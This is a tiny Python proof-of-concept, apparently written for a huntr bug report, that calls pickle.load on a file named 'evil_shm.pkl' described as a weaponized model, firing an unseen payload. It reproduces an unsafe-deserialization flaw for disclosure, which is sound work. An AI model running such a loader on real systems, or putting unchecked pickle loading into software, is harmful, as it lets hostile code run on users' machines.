| import pickle | |
| # Loader PoC - loads the weaponized model file and fires the payload on the default path. | |
| # Reproduction for huntr: run with the real library's default load path. | |
| with open(r"evil_shm.pkl", "rb") as f: | |
| pickle.load(f) # fires the payload | |
| print("loaded - payload fired") | |